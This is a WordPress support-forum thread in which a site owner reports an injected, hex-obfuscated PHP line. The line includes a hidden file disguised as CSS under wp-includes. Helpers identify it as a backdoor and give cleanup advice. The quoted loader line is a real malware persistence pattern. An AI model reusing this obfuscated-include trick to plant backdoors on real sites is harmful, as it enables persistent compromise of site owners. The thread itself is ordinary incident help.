/ff874/ $ra1f = “/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\x70/.6aaa2d4f.css”; if (1){ @include_once /* okh */ ($ra1f); } /ff874/ The css file (6aaa2d4f.css) referenced contains php code, as I have seen. Google Chrome keeps telling me that my website is dangerous. The AIOS plugin has also independently switched off the option “File and folder permissions in WordPress regulate access and read and write rights” and has changed the current permission for wp-config.php. Is it possible that the AIOS plugin creates all of this itself or is this an indication of a hacker attack?
The page I need help with: [log in to see the link]
No AIOS do not add such code. Generally, wp-config.php permission should be 0640
But somehow if the hacker code is added in plugin or file upload as php file it allows to edit the wp-config.php as per permission ( generally many plugins / wordperss install writes to wp-config.php ) . you can change it to 0400 once you removed that hacked code in wp-config.php to it will not be writable.
It is an indication of hacker code. please take backup of it. check which files have recently been added if possible upgrade the WordPress files, Pluings / themes files and cross check in wp-content there is no any such php file.
This will cause PHP to throw a fatal error and render your site unusable.
To safely delete this file, please check both your .user.ini file and your php.ini file and ensure this file is not set in the auto_prepend_file directive.
Please ask your web hosting provider if you need guidance with executing the aforementioned steps. */ $GLOBALS[‘aiowps_firewall_rules_path’] = DIR.’/wp-content/uploads/aios/firewall-rules/’;
Hello, thank you for your answer. 🙂 Now I keep having the problem that, despite the security plugin, there are probably “malicious” files on my blog. I then delete them again and again. Somewhere in a file, after a short time, a line is always added to an existing file, such as this:
– then to a new one created file, which is usually disguised as a CSS file, but contains PHP lines. In addition, the write permissions from wp-config.php are automatically implemented each time. I had set them to 400 as you suggested and today they were back to 755. But I don’t see any changes in the wp-config.php. But my database password can be seen there. Is it possible that the password can also be read by others? I also reinstalled WordPress and renewed all the plugins.
AIOS has a list of features which provides certain level security.
In your case somehow the PHP file execution code got uploaded might be due to a plugin or ftp account hack and it is beyond of AIOS.
It needs to indentify backdoor script which keeps writing the code and changing permission of wp-config.php file. Also the reason how tha backdoor script uploaded there.
You need to get help of the developer or malware removal service provider for WordPress.
In wp-config.php DB password required to access by the WordPress Code file for Data Operation.